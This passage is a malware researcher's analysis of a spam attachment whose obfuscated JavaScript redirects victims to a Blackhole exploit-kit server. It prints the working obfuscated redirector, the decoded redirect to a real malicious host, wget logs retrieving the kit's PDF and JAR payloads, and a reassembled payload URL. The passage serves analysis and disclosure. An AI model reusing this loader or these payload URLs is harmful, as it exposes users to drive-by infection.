======================================
#MalwareMustDie ; @unixfreaxjp ~]$ date
Thu Nov 22 17:27:12 JST 2012
The finding of the obfuscation version PluginDetect 0.7.9
And a guide how to decode it manually
WARNING: The urls in the note is may infect your PC, do not attempt to click them
=======================================
I had reports of two infections of email attached with obfuscated HTML infector
in the twitter thanks to @KDPryor as per following pic snapshots;
https://twitter.com/MalwareMustDie/status/271104793567707137
https://twitter.com/MalwareMustDie/status/271439256264777728
-----------------------------------------------------------------------
//The attached HTML infector looks like this:
Please wait..
You will be forwarded... Please wait..
Internet Explorer and Mozilla Firefox compatible only
----------------------------------------------------------------
// contains the ↑obfuscated redirector by javascript:
// which can be decoded easily with the below methods....
// PS: The pic of this deobfuscation is in here: https://pbs.twimg.com/media/A8Mk_pOCYAEm_lL.jpg:large
try
{
if(window.document)window["doc"+"ument"]["body"]="vasasf"
}
catch(bawetawe)
{
if(true) <==========
// ^^^^^^^
{
v=1; <==============
// ^^^^^^
try
{
fawbe--
}
catch(afnwenew)
{
try
{
(v+v)()
}
catch(gngrthn)
{
try
{
if(020===0x10)v["document"]["bo"+"dy"]="123"
}
catch(gfdnfdgber)
{
m=123;
if("".substr)ev=eval;
}
}
n=["4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e","1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g","17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45","4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h","4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49","1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c","19","29","50","a"];
h=2;
s="";
if(m)for(i=0;i-106!=0;i++)
{
k=i;
if(true)s+=String.fromCharCode(parseInt(n[i],25)); <========
// ^^^^^^^^
}
z=s;
ev(""+z)
}
}
}
----------------output ↓-------------------
var1=49;
var2=var1;
if(var1==var2) {document.location="http://hamasutra.ru:8080/forum/links/column.php";}
---------------------------------------
// let's fetch to know the source...
//below is a successful attempt...
--12:43:04-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php'
Resolving hamasutra.ru... 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Connecting to hamasutra.ru|216.24.196.66|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:43:09 (106.64 KB/s) - `column.php' saved [92154]
// unsuccessful attempt is like below reference....
// syou must try again with the different IP/references
--12:43:26-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php.1'
Resolving hamasutra.ru... seconds 0.00, 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Caching hamasutra.ru => 216.24.196.66 82.165.193.26 202.180.221.186 203.80.16.81
Connecting to hamasutra.ru|216.24.196.66|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5560 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 502 Bad Gateway
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 03:43:22 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
// This is the file fetched...
//
@unixfreaxjp /malware]$ date
Thu Nov 22 12:47:02 JST 2012
@unixfreaxjp /malware]$ ls -alF
-rwx------ 1 xxxx xxxx 92154 Nov 21 18:43 column.php*
// The inside of the fetched column.php as per below...
// It is obfuscated Plugindetect 0.7.9 <==== POINT!
-----------------------------------------------------------------------------
// IS this really a BHEK2?
// try to fetch t.pdf & jars...
// with the current settings...
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie is banging on your Door
--referer (referer) to http://www.ups.com/?Site=Corporate&cookie=am_en_home_none // this is url referer of one of the spam emails
// get t.pdf
--12:58:25-- http://hamasutra.ru:8080/forum/data/t.pdf
Resolving hamasutra.ru... seconds 0.00, 203.80.16.81, 216.24.196.66, 82.165.193.26, ...
Caching hamasutra.ru => 203.80.16.81 216.24.196.66 82.165.193.26 202.180.221.186
Connecting to hamasutra.ru|203.80.16.81|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5528 (new refcount 1).
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 12:21:44 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
12:58:27 (79.24 KB/s) - `t.pdf' saved [8103/8103]
// get spn.jar
---request begin---
GET /forum/data/spn.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:00:25 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350002-32c4-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 12996
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 12,996 (13K) [application/java-archive]
13:00:31 (85.16 KB/s) - `spn.jar' saved [12996/12996]
// get spn2.jar
---request begin---
GET /forum/data/spn2.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:02:30 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350003-4fb8-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 20408
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 20,408 (20K) [application/java-archive]
3:02:35 (73.93 KB/s) - `spn2.jar' saved [20408/20408]
// get spn3.jar
---request begin---
GET /forum/data/spn3.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:01:38 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,022 (21K) [application/java-archive]
13:03:43 (31.58 KB/s) - `spn3.jar' saved [21022/21022]
// Let's test whether this is not CoolEK or other EK by testing
// special function of BHEK PluginDetect 0.7.9 = getJavaInfo.jar
// lets fetch the getJavaInfo.jar
---request begin---
GET /forum/data/getJavaInfo.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:08:27 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "13504e0-24b-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 587
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 587 [application/java-archive]
13:10:30 (17.13 MB/s) - `getJavaInfo.jar' saved [587/587]
------------------------------------------------------------------------
// back to the evil script of column.php..
// let's make it beautiful to read...
//↑oh, at the bottom there's a direct download url...
// look like a pdf download to me..,
// let's assemble the army! no, ...assemble the url↓
..blah..../forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f
--------------------------------------------------
// Let's fetch this file....
Resolving hamasutra.ru... seconds 0.00, 82.165.193.26, 202.180.221.186, 203.80.16.81, ...
Caching hamasutra.ru => 82.165.193.26 202.180.221.186 203.80.16.81 216.24.196.66
Connecting to hamasutra.ru|82.165.193.26|:8080... seconds 0.00, connected.
Created socket 1896.
---request begin---
GET //forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 05:35:20 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 14749
Content-Disposition: inline; filename=1ed92.pdf
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 14,749 (14K) [application/pdf]
13:40:29 (23.61 KB/s) - `column.php@hdf=30%3A1n%3A1i%3A1i%3A33&puihqtt=b&hdmk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pgrzxii=1f%3A1d%3A1f%3A1d%3A1f%3A1d%3A1f' saved [14749/14749]
// let's rename the long filename into shortone...
// caled it infector.pdf
------------------------------------------
// OK we got the many samples..
// We proved it was BHEK2,
// We go back to the rest of the garbled code column.php.....
// we all want to se the PluginDetect 0.7.9 is really obfuscated or not do we?
// OK, let's strip the html code EXCEPT the tags with values....
// To make it easier, let's see the structure of this code first...